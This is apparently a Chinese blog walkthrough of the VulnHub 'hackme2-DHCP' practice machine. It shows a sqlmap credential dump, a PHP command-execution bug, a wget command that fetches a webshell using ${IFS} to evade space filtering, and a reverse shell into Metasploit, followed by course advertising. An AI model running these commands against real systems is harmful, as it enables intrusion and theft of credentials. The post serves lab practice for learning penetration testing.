hackDHCP靶场教程

hackDHCP靶场教程

靶场地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova

img

第一眼就看见了注册,那么这个靶场的思路可能就是注册后的操作,毕竟如果不是,开了这个也没什么用

注册一个用户,然后登陆,登陆成功,翻译了一下是个图书查询的系统

img

img

img

通过页面对比,猜测是个注入

跑了一下

sqlmap -r a.txt -vv --tamper=space2comment --dbms “MySQL” --level 5 -D webapphacking -C “user,pasword” –dump

结果

img

特殊的用户

Superadmin

解密后

img

进来了

img

超级管理员权限

进来的页面有两个点,一个是文件上传,一个是不知道干什么的表单提交,思考如下

制作者考的肯定不是上传点,很明显上传点会难一些,地下更不会放一个无用的表单,挂上XRAY,对功能进行打点,找出容易攻击到的点

Xray扫描入下

img

可以执行PHP代码

尝试复现

img

img

命令执行成功

Wge 下载webshell wget${IFS}http://0.0.0.0//a.php

${IFS}是代替空格的占位符,上线

img

上传脚本到

img

img

img

发现了一个特殊文件

img

切换到交互式,还需要往外弹一下

img

卡壳

最终解决,上传冰蝎马反弹msf 唉,不知道这个靶子为什么nc 用不了

img

img

img

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3pPUKfN8-1689928133268)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]

享!](https://mp.weixin.qq.com/s/BWb9OzaB-gVGVpkm161PMw)

学习资源分享

[外链图片转存中…(img-3pPUKfN8-1689928133268)]

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值